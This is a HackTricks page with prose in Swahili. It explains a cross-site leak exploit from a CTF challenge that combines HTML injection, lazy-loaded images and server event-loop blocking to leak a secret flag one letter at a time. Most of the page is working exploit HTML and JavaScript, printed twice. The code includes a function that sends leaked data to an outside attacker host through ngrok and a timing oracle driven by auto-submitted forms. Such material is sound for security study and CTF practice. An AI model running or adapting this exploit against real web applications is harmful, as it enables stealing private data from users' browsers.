Event Loop Blocking + Lazy images

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Katika hii exploit, @aszx87410 anachanganya lazy image side channel mbinu kupitia HTML injection na aina ya event loop blocking technique ili kuvuja herufi.

Hii ni exploit tofauti kwa ajili ya CTF chall ambayo tayari imejadiliwa kwenye ukurasa ufuatao. angalia kwa maelezo zaidi kuhusu changamoto:

Connection Pool Examples

Wazo nyuma ya hii exploit ni:

Post zinapakiwa kwa alfabeti
Mshambuliaji anaweza kuingiza post inayaanza na "A", kisha baadhi ya HTML tag (kama <canvas kubwa) itajaza sehemu kubwa ya skrini na baadhi ya <img lazy tags za mwisho kupakia vitu.
Ikiwa badala ya "A" mshambuliaji anaingiza post hiyo hiyo lakini inaanza na "z". Post yenye bendera itaonekana kwanza, kisha post iliyounganishwa itaonekana ikiwa na "z" ya awali na canvas kubwa. Kwa sababu post yenye bendera ilionekana kwanza, canvas ya kwanza itachukua skrini yote na <img lazy tags za mwisho zilizounganishwa hazitaonekana kwenye skrini, hivyo hazitapakiwa.
Kisha, wakati bot inafanya kufikia ukurasa, mshambuliaji atatuma fetch requests.
Ikiwa picha zilizounganishwa kwenye post zinapakiwa, hizi fetch requests zitachukua muda mrefu, hivyo mshambuliaji anajua kwamba post iko kabla ya bendera (kwa alfabeti).
Ikiwa fetch requests ni za haraka, inamaanisha kwamba post iko baada ya bendera kwa alfabeti.

Hebu tuangalie msimbo:

<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Previousperformance.now + Force heavy task NextJavaScript Execution XS Leak

Last updated 4 months ago

<!DOCTYPE html> <html>  <body> <button onclick="run()">start</button>  <form id=f action="http://localhost:1234/create" method="POST" target="_blank"> <input id=inp name="text" value=""> </form>  <form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank"> <input id=inp2 name="index" value=""> </form> <script> let flag = 'SEKAI{' const TARGET = 'https://safelist.ctf.sekai.team' f.action = TARGET + '/create' f2.action = TARGET + '/remove' const sleep = ms => new Promise(r => setTimeout(r, ms)) // Function to leak info to attacker const send = data => fetch('http://server.ngrok.io?d='+data) const charset = 'abcdefghijklmnopqrstuvwxyz'.split('') // start exploit let count = 0 setTimeout(async () => { let L = 0 let R = charset.length - 1 // I have omited code here as apparently it wasn't necesary // fallback to linerar since I am not familiar with binary search lol for(let i=R; i>=L; i--) { let c = charset[i] send('try_' + flag + c) const found = await testChar(flag + c) if (found) { send('found: '+ flag+c) flag += c break } } }, 0) async function testChar(str) { return new Promise(resolve => { /* For 3350, you need to test it on your local to get this number. The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold If starts with "A", the image should be loaded because it's in the threshold. */ // <canvas height="3350px"> is experimental and allow to show the injected // images when the post injected is the first one but to hide them when // the injected post is after the post with the flag inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('') f.submit() setTimeout(() => { run(str, resolve) }, 500) }) } async function run(str, resolve) { // Open posts page 5 times for(let i=1; i<=5;i++) { window.open(TARGET) } let t = 0 const round = 30 //Lets time 30 requests setTimeout(async () => { // Send 30 requests and time each for(let i=0; i<round; i++) { let s = performance.now() await fetch(TARGET + '/?test', { mode: 'no-cors' }).catch(err=>1) let end = performance.now() t += end - s console.log(end - s) } const avg = t/round // Send info about how much time it took send(str + "," + t + "," + "avg:" + avg) /* I get this threshold(1000ms) by trying multiple times on remote admin bot for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold */ const isFound = (t >= 1000) if (isFound) { inp2.value = "0" } else { inp2.value = "1" } // remember to delete the post to not break our leak oracle f2.submit() setTimeout(() => { resolve(isFound) }, 200) }, 200) } </script> </body> </html>